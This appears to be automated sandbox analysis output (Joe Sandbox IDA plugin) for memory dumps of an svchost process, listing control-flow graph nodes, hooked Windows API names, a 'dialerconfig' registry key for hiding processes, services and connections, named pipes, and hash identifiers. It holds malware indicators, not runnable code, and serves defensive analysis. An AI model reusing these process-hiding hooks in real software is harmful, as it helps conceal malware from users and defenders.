2295d562e9d-2295d562ea3 246->256 247->248 257 2295d562ecb-2295d562ed8 247->257 250 2295d562eef-2295d562ef9 call 2295d561d28 248->250 251 2295d562efb-2295d562f08 lstrlenW 248->251 250->251 264 2295d562f43-2295d562f48 250->264 259 2295d562f2b-2295d562f3d call 2295d563930 251->259 260 2295d562f0a-2295d562f14 251->260 261 2295d562f96-2295d562f9c 253->261 254->255 272 2295d562ffa-2295d563005 254->272 265 2295d562fe5-2295d562fef call 2295d563930 255->265 266 2295d562fc4-2295d562fce 255->266 263 2295d562ea9-2295d562eae 256->263 256->264 267 2295d562edb-2295d562ee1 257->267 259->264 275 2295d562ff2-2295d562ff4 259->275 260->259 270 2295d562f16-2295d562f29 call 2295d561554 260->270 271 2295d562f9e-2295d562fa3 261->271 261->272 263->239 263->256 264->275 265->275 266->265 276 2295d562fd0-2295d562fe3 call 2295d561554 266->276 267->264 277 2295d562ee3-2295d562ee8 267->277 270->259 270->264 271->244 271->261 279 2295d56307c-2295d563080 272->279 280 2295d563007-2295d56300b 272->280 275->237 275->272 276->265 276->272 277->248 277->267 279->237 284 2295d56300d-2295d563011 280->284 285 2295d563013-2295d56302d call 2295d5686a0 280->285 284->285 288 2295d563030-2295d563033 284->288 285->288 291 2295d563035-2295d563053 call 2295d5686a0 288->291 292 2295d563056-2295d563059 288->292 291->292 292->279 294 2295d56305b-2295d563079 call 2295d5686a0 292->294 294->279
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: f2a50276a7f58650b45cb133d784554c7d0c909d8cf186fa0b951f4959fe23cb
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: A6B1A032310690A1FB668FADE5487A9A3A4F744B94FD45026FE0953798EF35CCE2C360

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: ec8428cfff50fd4698ec7a4d76673dc6833da7d9a6fe1aa8436e99a841b4a814
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 00317272304B80A5EB618FB4E8447DD7360F784754F84442AEB4D47B98EF38C599C720
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 3032b272586a6c397c41cf937fc48523399078f95e56603a1cc937f571c125ad
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 26315F32314B8096EB61CF69E84439E73A4F788794F900116EB9D43BA8EF38C596CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 2ede8e80a4922f46ea2b94f1ca3103131468163758670aabf093de3d06320519
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: CEE1F132B14A80AAE712CFACD4882DD7BB1F3457D8FA44116EE4A57B9DDA34C4A7C710

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 9694f6a56c70c1e61b2cb303acce30649b4cd8d78f3a5f68c02a3686739e7b9d
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 1F712D36311A50A6EF11DFAAE848AAD27B4F784BD9F801111EE4D47B2CEF34C4A6C310

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 9358fa33283ac00e48e3eef096d7c2d4eae6e59f5b07b3883fc98092d27cb8ea
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 50517C72315B44A6EB11CFAAE44879AB7A1F789BD0F948124EB5907B18DF38C0A6C710

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 8f0406c9d72b5bc1e1389ac32f2862628cca4651ba679a8cc03cb218467e707d
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 83318264714A4AB0FA0BEFECF85A6D42321A744384FE05523F51D161AD9E3882FBC3B0

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 59b3c048340175dda705e04b33da8eef287338f84e38432b0e44bfee1e5aaebc
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 93213D36714B40A2FB11CB69F54835A63A0F389BE5FA04215EA5942BACDF3CC19ACB10

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: e8debce94c918ebd2bccc068a38c4033034fbb1ff3e4cd6db11c0c3b8dc11bd9
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 0341A433214B80E7EB61CF95E4487AEB7A1F389794F408125EB8907B58DF38C1A5CB10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 429 2295d5675f0-2295d5675f6 430 2295d5675f8-2295d5675fb 429->430 431 2295d567631-2295d56763b 429->431 432 2295d5675fd-2295d567600 430->432 433 2295d567625-2295d567664 call 2295d567ca0 430->433 434 2295d567758-2295d56776d 431->434 435 2295d567618 __scrt_dllmain_crt_thread_attach 432->435 436 2295d567602-2295d567605 432->436 449 2295d56766a-2295d56767f call 2295d567b34 433->449 450 2295d567732 433->450 437 2295d56776f 434->437 438 2295d56777c-2295d567796 call 2295d567b34 434->438 444 2295d56761d-2295d567624 435->444 440 2295d567607-2295d567610 436->440 441 2295d567611-2295d567616 call 2295d567be4 436->441 442 2295d567771-2295d56777b 437->442 452 2295d5677cf-2295d567800 call 2295d567e70 438->452 453 2295d567798-2295d5677cd call 2295d567c5c call 2295d567afc call 2295d567ff8 call 2295d567e10 call 2295d567e34 call 2295d567c8c 438->453 441->444 461 2295d56774a-2295d567757 call 2295d567e70 449->461 462 2295d567685-2295d567696 call 2295d567ba4 449->462 454 2295d567734-2295d567749 450->454 463 2295d567811-2295d567817 452->463 464 2295d567802-2295d567808 452->464 453->442 461->434 481 2295d5676e7-2295d5676f1 call 2295d567e10 462->481 482 2295d567698-2295d5676bc call 2295d567fbc call 2295d567aec call 2295d567b18 call 2295d569cdc 462->482 469 2295d56785e-2295d567874 call 2295d563458 463->469 470 2295d567819-2295d567823 463->470 464->463 468 2295d56780a-2295d56780c 464->468 475 2295d5678ff-2295d56790c 468->475 490 2295d5678ac-2295d5678ae 469->490 491 2295d567876-2295d567878 469->491 476 2295d56782f-2295d56783d call 2295d573358 470->476 477 2295d567825-2295d56782d 470->477 484 2295d567843-2295d567858 call 2295d5675f0 476->484 494 2295d5678f5-2295d5678fd 476->494 477->484 481->450 502 2295d5676f3-2295d5676ff call 2295d567e60 481->502 482->481 532 2295d5676be-2295d5676c5 __scrt_dllmain_after_initialize_c 482->532 484->469 484->494 492 2295d5678b0-2295d5678b3 490->492 493 2295d5678b5-2295d5678ca call 2295d5675f0 490->493 491->490 499 2295d56787a-2295d56789c call 2295d563458 call 2295d567758 491->499 492->493 492->494 493->494 511 2295d5678cc-2295d5678d6 493->511 494->475 499->490 526 2295d56789e-2295d5678a6 call 2295d573358 499->526 519 2295d567725-2295d567730 502->519 520 2295d567701-2295d56770b call 2295d567d78 502->520 516 2295d5678d8-2295d5678df 511->516 517 2295d5678e1-2295d5678f1 call 2295d573358 511->517 516->494 517->494 519->454 520->519 531 2295d56770d-2295d56771b 520->531 526->490 531->519 532->481 533 2295d5676c7-2295d5676e4 call 2295d569c78 532->533 533->481
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 177c773e1e7dfd8a5ed4220e107583d9124d25de35631a206f5b1d63bb2b8b62
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: AE81D021B10241A6FA629BFDB84D3596290B7457C0FD84125FA1847BAEEF38C8E7C730

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 322 2295d5369f0-2295d5369f6 323 2295d536a31-2295d536a3b 322->323 324 2295d5369f8-2295d5369fb 322->324 325 2295d536b58-2295d536b6d 323->325 326 2295d5369fd-2295d536a00 324->326 327 2295d536a25-2295d536a64 call 2295d5370a0 324->327 331 2295d536b7c-2295d536b96 call 2295d536f34 325->331 332 2295d536b6f 325->332 329 2295d536a02-2295d536a05 326->329 330 2295d536a18 __scrt_dllmain_crt_thread_attach 326->330 345 2295d536a6a-2295d536a7f call 2295d536f34 327->345 346 2295d536b32 327->346 336 2295d536a11-2295d536a16 call 2295d536fe4 329->336 337 2295d536a07-2295d536a10 329->337 334 2295d536a1d-2295d536a24 330->334 343 2295d536bcf-2295d536c00 call 2295d537270 331->343 344 2295d536b98-2295d536bcd call 2295d53705c call 2295d536efc call 2295d5373f8 call 2295d537210 call 2295d537234 call 2295d53708c 331->344 338 2295d536b71-2295d536b7b 332->338 336->334 354 2295d536c02-2295d536c08 343->354 355 2295d536c11-2295d536c17 343->355 344->338 357 2295d536b4a-2295d536b57 call 2295d537270 345->357 358 2295d536a85-2295d536a96 call 2295d536fa4 345->358 349 2295d536b34-2295d536b49 346->349 354->355 359 2295d536c0a-2295d536c0c 354->359 360 2295d536c19-2295d536c23 355->360 361 2295d536c5e-2295d536c74 call 2295d532858 355->361 357->325 375 2295d536a98-2295d536abc call 2295d5373bc call 2295d536eec call 2295d536f18 call 2295d5390dc 358->375 376 2295d536ae7-2295d536af1 call 2295d537210 358->376 365 2295d536cff-2295d536d0c 359->365 366 2295d536c2f-2295d536c3d call 2295d542758 360->366 367 2295d536c25-2295d536c2d 360->367 378 2295d536cac-2295d536cae 361->378 379 2295d536c76-2295d536c78 361->379 372 2295d536c43-2295d536c58 call 2295d5369f0 366->372 389 2295d536cf5-2295d536cfd 366->389 367->372 372->361 372->389 375->376 425 2295d536abe-2295d536ac5 __scrt_dllmain_after_initialize_c 375->425 376->346 398 2295d536af3-2295d536aff call 2295d537260 376->398 387 2295d536cb0-2295d536cb3 378->387 388 2295d536cb5-2295d536cca call 2295d5369f0 378->388 379->378 386 2295d536c7a-2295d536c9c call 2295d532858 call 2295d536b58 379->386 386->378 419 2295d536c9e-2295d536ca6 call 2295d542758 386->419 387->388 387->389 388->389 407 2295d536ccc-2295d536cd6 388->407 389->365 409 2295d536b01-2295d536b0b call 2295d537178 398->409 410 2295d536b25-2295d536b30 398->410 413 2295d536ce1-2295d536cf1 call 2295d542758 407->413 414 2295d536cd8-2295d536cdf 407->414 409->410 424 2295d536b0d-2295d536b1b 409->424 410->349 413->389 414->389 419->378 424->410 425->376 426 2295d536ac7-2295d536ae4 call 2295d539078 425->426 426->376
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926248027.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d530000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: e9bb5c31c14fc3d395f6a425828c02ffbebde6951f409e7a1fe5992b683253f2
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 4981F021704685A6FA53AFED945935962D0EF95780FD4802DFA048779EDB38C8FB8730

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 536 2295d569804-2295d569842 537 2295d569848-2295d56984b 536->537 538 2295d569933 536->538 539 2295d569935-2295d569951 537->539 540 2295d569851 537->540 538->539 541 2295d569854 540->541 542 2295d56992b 541->542 543 2295d56985a-2295d569869 541->543 542->538 544 2295d56986b-2295d56986e 543->544 545 2295d569876-2295d569895 LoadLibraryExW 543->545 546 2295d56990d-2295d56991c call 2295d573090 544->546 547 2295d569874 544->547 548 2295d5698ed-2295d569902 545->548 549 2295d569897-2295d5698a0 call 2295d573080 545->549 546->542 556 2295d56991e-2295d569929 546->556 552 2295d5698e1-2295d5698e8 547->552 548->546 550 2295d569904-2295d569907 FreeLibrary 548->550 557 2295d5698cf-2295d5698d9 549->557 558 2295d5698a2-2295d5698b7 call 2295d56ad28 549->558 550->546 552->541 556->539 557->552 558->557 561 2295d5698b9-2295d5698cd LoadLibraryExW 558->561 561->548 561->557
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: dc85a75abc711fb33c37209140bc320e9bd677249494bd85118dde110398db05
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 7F318431312650F1FE139B9AB4087996394B749BA0F994525FE2D4B39CEF38C4E6C720

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 4d72f3105d719a63821fe754c6d7dd19382ae42c4a80501f2782a2bd43ef267e
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: D611C431314B5096F7518B8AE84871977A4F388FF4FA00225FE6E87798CF38C5A58750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: af2c629c012e9adac4229a14eacd238263cdae950b7cfdce04b58a675a87641c
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 39D18C76208B88D2DA71DB59F49835A77A0F3C8B84F540216FA8D47BA9DF3CC592CB10
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 0933069cf0e1490756b4d83f88b27466ff5f6f5a4cb0ffb68886df60d643d9f4
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 9B317021701B55A2FB56DF9AE84866967A0FB46BD4F888120EF4907B58EF38C4F3C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: b77691d71fa82fd0f0c879284ef49ff13d48701d03fc163ecb9bb793dd36b294
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: A3016D31300A41A6FB11DB96A45C76963A1F788FD0F984435EE9A43768DE3CC9D6C350
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 4cbb42e127e58c53af39564505926530af553a3f5e6320148cbfec8e0bb101a7
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 73118475301741A2FB269BA9F40D75663A0BB58BD5F940428EE590775CEF3CC0AAC720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: a23fc60485f0c380312dd1d7e3229ddd13c337a1fb1e7acd51aa5a4cffb3b8c1
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: FF51B032311640EBEB16DF99F44CB593395F344B98FA08120EA164B78CEB35D9D2CB20
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: f5150f63948c35c53ac81c47d062bafe7da57ac8993b4762ae4789a995be2596
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 4B319E32310680E6E716DF59F84C71937A5F748BD8FA58114FE5A0B749DB38C9A2CB24
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 7fe597ed2677da22335033f5e41d13b9115a435c11a0163dc208282d719bda32
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 3DF0A422300641A2FB318BA9F4987696760F754BD8FD48020EA484A96CDE2CC6DAC710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: cc02822e64b4b43800a6494ef65c193e0582d1c11f55bb9244bc4ef4555baaa7
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: D5F08260304B80A1FA118B9BF90C1196221EB48FE0F988131FF6A07B2CCE2CC4E7C310
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 7eacd118fc183eabda9bc05fae293b562405534fa16fb932430ef6238a9dd696
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 07F01261311644B1FF578BE9F88C36923A0AB48BD1FA42019F61B45578DF38C4EAC720
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: cfd658ea2cdb61fb7e280d60c831be61231c77804aebe3abdfbc6e827c43d649
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 5C02C932219B8096E7A1CF99F49835AB7A0F3C5B94F504115FA8E87BA8DF7CC495CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
